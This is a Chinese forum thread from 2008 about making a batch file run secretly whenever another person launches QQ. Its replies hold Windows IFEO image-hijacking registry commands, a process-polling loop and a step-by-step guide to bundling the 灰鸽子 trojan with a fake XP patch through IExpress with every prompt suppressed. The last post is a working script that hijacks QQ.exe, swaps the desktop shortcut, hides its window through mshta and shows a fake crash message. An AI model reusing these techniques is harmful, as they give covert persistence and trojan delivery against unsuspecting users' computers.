标题: 如何将bat文件捆绑在QQ上? [打印本页]
作者: ytjiushiwo 时间: 2008-7-19 00:33 标题: 如何将bat文件捆绑在QQ上?
如果将.bat文件捆绑在QQ上?
也就是说..QQ一启动..就自动运行.bat文件?
作者: HAT 时间: 2008-7-19 01:22
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"\" \"C:\Program Files\Tencent\QQ\QQ.exe"&&start \"C:\test.bat\"" /f
这样可以吗?[ Last edited by HAT on 2008-7-21 at 09:50 AM ]
作者: mgq 时间: 2008-7-19 08:41
学习了,映像劫持原来是这样用的。
作者: moniuming 时间: 2008-7-19 12:48
估计楼主要做坏事吧
作者: moniuming 时间: 2008-7-19 13:14
不行啊,我用下面的代码修改了注册表后,无法运行QQ,删除了这个键以后才能运行QQ,不知道为什么上传不了文件,无法贴出截图.
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"\" \"d:\Program Files\Tencent\QQ\QQ.exe\"&&start \"f:\test\test4\1.bat\"" /f >nul
pause
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"\" \"d:\Program Files\Tencent\QQ\QQ.exe\"&&start \"f:\test\test4\1.bat\"" /f >nul
pause
作者: wert123 时间: 2008-7-19 13:14
学习了
作者: wert123 时间: 2008-7-19 13:19
学习了
作者: tireless 时间: 2008-7-19 15:56
我也试了,不行。
作者: tireless 时间: 2008-7-19 15:58
另一种比较低级的办法是,给你那个bat创建个快捷方式,把图标改为qq的图标。
作者: ytjiushiwo 时间: 2008-7-19 16:38
不可以..
楼上的注册表怎么和我的不同?
在我的注册表里找不到楼上的那个..I带头的那个子键
能不能用批处理命令让用户登陆上QQ之后..自动执行批处理文件?
我的目的是..让别人一运行QQ的时候..用msg命令自动跳出提示..然后打开和我聊天的对话框
作者: HAT 时间: 2008-7-19 20:05
有个笨办法就是每隔一段时间检测一下进程列表里面有没有qq.exe,不过这样太浪费系统资源了。我再看看qq的注册表项,不知道能否有新的发现。
作者: 523066680 时间: 2008-7-19 20:39
XP自带捆绑器IEXPRESS使用方法(转的)
首先在“运行”对话框中输入 iexpress 就可以起用程序了!
“Create new Self Extraction Directive file” 意思是:“创建新的自解压文件”
“Open existing Self Extraction Directive file”意思是:“打开已保存的自解压文件”
在这里我们当然就要选者第一项了
这里我们就来选者制作木马自解压包的方式,这里有3中
1.“Extract files and run an installation command” 创建自解压并自动安装压缩包
2.“Extract files only” 只创建个自解压压缩包
3.“Create compressed files only(ActiveX Installs)” 应该是创建个CAB的压缩包吧。
这里当然就选者第一项了拉 然后“下一步” 输入压缩包的标题 我在这里就随便输入下
这一项 是询问我们在程序解压时是否提示,木马就是要隐蔽!
当然要选者“NOprompt” “不提示”
-----------------------------------------------------------------------------------------
这项是让我们添加“用户允许协议”
“Do not display a license”是不显示用户允许协议
而“Display a license”则是显示用户允许协议
一般软件都有“用户允许协议” 只有选者了“同意”才可以继续
在这里 我就还是选者显示 用户允许协议 好了。当然你也可以选者不显示用户允许协议
我们的先建立个记事本,把用户协议内容输入进去!我也就随便输入下好了
然后点 Display a license—Browse浏览到那个TXT文件
----------------------------------------------------------------------------------------
这里我们就可以开始添加木马和要与木马一起捆绑在一起的正常程序
点“Add”进行添加 Filename和Path 分别显示文件名和路径
这里我就添加木马程序 灰鸽子跟合法程序XP的一个补丁 添加是没有顺序的
----------------------------------------------------------------------------------------
这里是安装程序选者窗口,Install Program这里是指定解压缩包开始运行的文件 也就是说
应该选者那个合法的程序
Post Install Command 是指定安装完后运行的程序,当然也就是我们在后台运行的木马拉
----------------------------------------------------------------------------------------
在显示模式 这里选者 Default(recommended)保持默认“下一步”继续“下一步”
表示都不显示,木马当然是越隐蔽越好 ^_^
----------------------------------------------------------------------------------------
接着我们来设置解压程序的保存位置和名称 我就随便填下
建议最好勾选“Hide File Extracting Progress Animation from User”
有助于隐藏某些木马程序启动时弹出的命令提示框
----------------------------------------------------------------------------------------
Configure restart 窗口是让我们置在软件安装完成后是否重新启动
如果你所用的木马是“即插即用”的,那么就选择“No reboot”;
如果所采用的木马用于开启终端服务,那么可选择“Always reboot”
也最好勾选“Do not prompt user before reboot”(重新启动前不提示用户)
继续下一步,就可以开始制作木马捆绑的工作了。
好了 我们来检测下吧
现在已经是最新版本了 在来扫描下之前的木马
那我们继续看下这个文件运行后 木马是否可以正常的运行
这是我随便输入的用户协议 大家做的时候可以伪装成XP补丁的协议就可以了
当然协议那项不选者 就不会有协议的那个窗口弹出来 了
鸽子已经运行了
稍微等下
来了
不用第三工具,让"Windows"为我们服务,为我们捆绑……,岂不快哉!!!结束
[ Last edited by 523066680 on 2008-7-19 at 08:41 PM ]
作者: ytjiushiwo 时间: 2008-7-19 23:13
楼上的是将2个文件捆绑在一起..并不是用批处理命令完成的.
我希望可以有能用批处理命令完成..
而且.2个文件捆绑不捆绑在一起无所谓.
只要能够在QQ运行之后能够让123.bat运行就可以了.
注意:最好是QQ刚刚启动就运行..
作者: 523066680 时间: 2008-7-20 15:30
哦 当没说 不好意思哈^-^ 虽然不太懂 不过还是要编个贴来补一下!
这样算不算?
:a
for /f "tokens=1*" %%a in ('tasklist /nh ^|find "QQ.exe"') do (
if %%a==QQ.exe start 123.bat
)
ping -n 2 127.0>nul
goto a
我QQ 一直都开着的 还没ping 延时的时候 搞的像炸药一样---
[ Last edited by 523066680 on 2008-7-20 at 03:40 PM ]
作者: ytjiushiwo 时间: 2008-7-20 18:40
这个好象太浪费系统资源了吧..
哪有一直用ping的..
不过.也是个方法。
但我觉得不太好.我希望可以..QQ刚打开的时候就可以运行123.bat
作者: AlexZhang 时间: 2008-7-21 00:22
那就映像劫持。。。
作者: 523066680 时间: 2008-7-21 07:30
偶像!!!!!每次看到版主字样 我就激动不已
作者: 523066680 时间: 2008-7-21 09:03 标题: 我们换一种思考方法
其实好像被我们想复杂了,我们把批处理QQ.bat连接到 QQ.exe
以后直接开QQ.bat 不就可以了?
看以下例子 :
start C:\Program Files\Tencent\QQ\QQ.exe
call 123.bat
既方便 又快捷
作者: HAT 时间: 2008-7-21 09:54
@echo off
>"C:\test.bat" echo @echo off
>>"C:\test.bat" echo start "" "C:\Program Files\Tencent\QQ\QQ.exe"
>>"C:\test.bat" echo hello world
rem 需要什么命令,就在后面接着用echo动态生成就行了。
>>"C:\test.bat" echo pause
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
>"C:\test.bat" echo @echo off
>>"C:\test.bat" echo start "" "C:\Program Files\Tencent\QQ\QQ.exe"
>>"C:\test.bat" echo hello world
rem 需要什么命令,就在后面接着用echo动态生成就行了。
>>"C:\test.bat" echo pause
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
作者: moniuming 时间: 2008-7-21 11:02 标题: 回19楼
在前两天我就试过这个方法了,不行的,因为启动test.bat后,会启动QQ,那么会再次启动test.bat,这样会陷入死循环,无法关闭,我已经被迫重启过了,(在虚拟机里测试的,哈哈...)
作者: ytjiushiwo 时间: 2008-7-21 13:18
第18楼的..我的意思不是像你所理解的一样.
我的意思是:用户打开QQ.EXE.然后在后台运行123.bat.而用户并不了解所发生的一切...
还有..19楼的.
你前面的命令是把18楼的意思写到了text.txt中吧..
但是..这句是什么意思?
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
1.我的注册表中在Image File Execution Options 下找不到qq.exe.为什么额?
2.这个好象用到了影象劫持技术..听说过..大概了解些..但是不太懂..你帮我看看我的理解是否正确..也就是说,在加如这个东西之后.用户打开qq.exe并不运行了..反而执行的是test.bat ..是否正确?所谓的影象劫持技术.是不是就是说,比如,用户要打开一个文件..首先系统要先启用解释这个文件类型的基础文件..而影象劫持技术就是把这个基础文件重新定向于另外一个文件..那么当用户在打开这个文件的时候就会自动打开我所定向的另外一个文件,而不执行用户原来的文件了?
作者: moniuming 时间: 2008-7-21 13:26 标题: 回21楼
1.那句代码就是在Image File Execution Options下加上qq.exe.
2.正确.
作者: HAT 时间: 2008-7-21 13:34 标题: to 20楼
@echo off
>"C:\test.bat" echo @echo off
>>"C:\test.bat" echo tasklist^|findstr /i QQ.exe
>>"C:\test.bat" echo if %%errorlevel%% neq 0 (
>>"C:\test.bat" echo start "" "C:\Program Files\Tencent\QQ\QQ.exe"
>>"C:\test.bat" echo )
>>"C:\test.bat" echo echo hello world
rem 需要什么命令,就在后面接着用echo动态生成就行了。
>>"C:\test.bat" echo pause
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
>"C:\test.bat" echo @echo off
>>"C:\test.bat" echo tasklist^|findstr /i QQ.exe
>>"C:\test.bat" echo if %%errorlevel%% neq 0 (
>>"C:\test.bat" echo start "" "C:\Program Files\Tencent\QQ\QQ.exe"
>>"C:\test.bat" echo )
>>"C:\test.bat" echo echo hello world
rem 需要什么命令,就在后面接着用echo动态生成就行了。
>>"C:\test.bat" echo pause
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
作者: moniuming 时间: 2008-7-21 15:03 标题: 回23楼
如果已经打开QQ,这个代码可以正常执行,但是没开qq的话,还是会陷入死循环,
作者: 523066680 时间: 2008-7-21 15:24
……看了一下21楼的 原来是做贼啊 难怪这么麻烦……可惜我不会vbs
我猜vbs应该做的到
作者: ytjiushiwo 时间: 2008-7-21 19:19
我尝试了下..
用印象劫持技术可以..
但是用了之后..就无法打开QQ了..
另外还有什么好方法吗`?
作者: juventus 时间: 2008-7-22 10:35
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QQ.exe" /v Debugger /t REG_SZ /d "start \"C:\test.bat\"" /f
我这 个都写不进去
这个 IFEO 怎么写不了
调用其实也可以
作者: XiuXiu 时间: 2008-7-22 14:07
如果是新版的QQ的话就把那个123.BAT文件编译成EXE文件,并改名为TXPlatform.exe
放在QQ.EXE同一目录下.这样就可以在打开QQ的时候运行了
作者: 523066680 时间: 2008-7-23 11:45
好家伙……我觉得成功的话 这个方法很好了
不过貌似楼主就是想要用bat解决这个问题
作者: moniuming 时间: 2008-7-23 20:49
其实用下面的方法可以实现(利用障眼法),但是打开QQ的时候会出现CMD窗口
@echo off
more +7<"%~0">"e:\program files\tencent\qq\moniuming.bat"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\ QQ.exe" /v Debugger /t REG_SZ /d "\"e:\program
files\tencent\qq\moniuming.bat\"" /f
copy /y "e:\program files\tencent\qq\qq.exe" "e:\program files\tencent\qq\ QQ.exe"
del /f /q "%userprofile%\桌面\qq.exe.lnk"
copy /y "e:\program files\tencent\qq\ QQ.exe" "%userprofile%\桌面\ QQ.exe"
exit
@echo off
if not "%~1"=="h" mshta vbscript:createobject("wscript.shell").run("%~fs0 h "%*"",0)
(window.close)&exit
start "" "e:\program files\tencent\qq\QQ.exe"
ping -n 5 127.1>nul
msg %username% /time:10 " 你的电脑已经崩溃,找东西擦眼泪去吧,哈哈..."
more +7<"%~0">"e:\program files\tencent\qq\moniuming.bat"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\ QQ.exe" /v Debugger /t REG_SZ /d "\"e:\program
files\tencent\qq\moniuming.bat\"" /f
copy /y "e:\program files\tencent\qq\qq.exe" "e:\program files\tencent\qq\ QQ.exe"
del /f /q "%userprofile%\桌面\qq.exe.lnk"
copy /y "e:\program files\tencent\qq\ QQ.exe" "%userprofile%\桌面\ QQ.exe"
exit
@echo off
if not "%~1"=="h" mshta vbscript:createobject("wscript.shell").run("%~fs0 h "%*"",0)
(window.close)&exit
start "" "e:\program files\tencent\qq\QQ.exe"
ping -n 5 127.1>nul
msg %username% /time:10 " 你的电脑已经崩溃,找东西擦眼泪去吧,哈哈..."
作者: xuan2056 时间: 2008-7-24 09:53
呵呵,楼主又想什么呢!